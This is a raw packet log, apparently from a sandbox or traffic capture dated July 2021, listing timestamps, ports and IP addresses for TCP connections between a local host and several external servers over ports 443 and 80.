Jul 22, 2021 11:43:02.397895098 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.397932053 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.397953987 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.397968054 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.397969007 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398005009 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398015022 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398044109 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398058891 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398098946 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398140907 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398159981 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398169994 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398176908 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398184061 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398215055 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398221970 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398252964 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398252964 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398288965 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398299932 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398328066 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398334026 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398364067 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398401976 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398437977 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398452997 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398495913 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398499012 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398540974 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398542881 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398591042 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398592949 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398642063 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398648977 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398696899 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398708105 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398760080 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398762941 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398813963 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398873091 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398874044 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398906946 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398924112 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.398925066 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.398974895 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399004936 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399024010 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399038076 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399070978 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399076939 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399120092 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399204969 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399245024 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399282932 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399298906 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399319887 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399328947 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399334908 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399357080 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399362087 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399394035 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399415016 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399434090 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399435997 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399480104 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399488926 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399521112 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399524927 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399558067 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399575949 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399595976 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399599075 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399632931 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399657965 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399669886 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399672985 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399707079 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399750948 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399760962 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399765968 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399810076 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399823904 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399883032 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.399884939 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399935007 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.399940968 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400006056 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400021076 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400072098 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400078058 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400135040 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400139093 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400196075 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400198936 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400257111 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400258064 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400309086 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400317907 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400353909 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400365114 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400422096 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400424004 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400475025 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400480032 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400531054 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400533915 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400588989 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400590897 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400645018 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400654078 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400710106 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400712967 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400763035 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400763988 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400815010 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400820017 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400872946 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400873899 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400928974 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400929928 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.400981903 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.400986910 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401036978 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401046991 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401087999 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401108980 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401156902 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401170015 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401216030 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401226044 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401278019 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401281118 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401333094 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401335955 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401381969 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401386976 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401428938 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401437998 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401485920 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.401492119 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.401536942 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:02.948043108 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:02.948260069 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.115638018 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.115710974 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.115748882 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.115788937 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.115839005 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.115859032 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.115900993 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.115914106 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.115950108 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.115989923 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.115993977 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116031885 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116070986 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116075993 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116110086 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116146088 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116158962 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116184950 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116219997 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116233110 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116266012 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116288900 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116307974 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116334915 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116345882 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116384983 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116405010 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116421938 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116457939 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116475105 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116497993 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116523027 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116534948 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116581917 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116590977 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116624117 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116650105 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116661072 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116700888 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116723061 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116739035 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116775990 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116812944 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116815090 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116849899 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116889000 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116898060 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116940975 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.116945982 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.116978884 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117011070 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117018938 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117058039 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117091894 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117093086 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117126942 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117131948 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117170095 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117202997 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117217064 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117254972 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117259026 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117296934 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117330074 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117336035 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117373943 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117409945 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117413044 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117448092 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.117491007 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.117563963 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:03.285501003 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.285563946 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.285617113 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.285675049 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.285726070 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.285773993 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.285815954 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:03.286082983 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:08.089339018 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:08.089472055 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:10.089215994 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:10.089324951 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:48.563767910 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:43:48.563812971 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:48.563916922 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:43:48.564161062 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:44:04.935544014 CEST	49739	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:04.982928038 CEST	80	49739	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:04.983059883 CEST	49739	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:05.202037096 CEST	49739	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:05.249411106 CEST	80	49739	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:05.249474049 CEST	80	49739	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:05.250051022 CEST	49739	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:05.338421106 CEST	80	49739	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:05.354886055 CEST	80	49739	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:05.400065899 CEST	49739	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.500912905 CEST	49739	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.549278021 CEST	80	49739	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.549391985 CEST	49739	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.644639015 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.692085028 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.692260981 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.703536034 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.753408909 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.753475904 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.755002975 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.802440882 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.802498102 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.802614927 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.802659988 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.802716970 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.802870035 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.843158007 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.843419075 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.850075006 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.850122929 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.850161076 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.850198030 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.850198030 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.850233078 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.850276947 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.850358963 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.850651026 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.850747108 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.850949049 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.851100922 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.851362944 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.851798058 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.890793085 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.890963078 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.899432898 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.899504900 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.899543047 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.899818897 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.900015116 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.900163889 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.900335073 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.900475979 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.900877953 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.901103020 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.901535988 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.901679039 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.901788950 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.901951075 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.902426958 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.902549982 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.938405991 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.938463926 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.938580036 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.938658953 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.947273970 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.947326899 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.947416067 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.947422981 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.947458982 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.947460890 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.947566032 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.947688103 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.947796106 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.947957993 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.948041916 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.948101997 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.948256969 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.948470116 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.948596001 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.948709011 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.948755980 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.948786974 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.948877096 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.949058056 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.949151039 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.949460030 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.949682951 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.949990988 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.950050116 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.950086117 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.950131893 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.950150967 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.950164080 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.950292110 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.950387001 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.950511932 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.950588942 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.950643063 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.950656891 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.950826883 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.950941086 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.951370955 CEST	80	49741	212.224.105.105	192.168.2.3
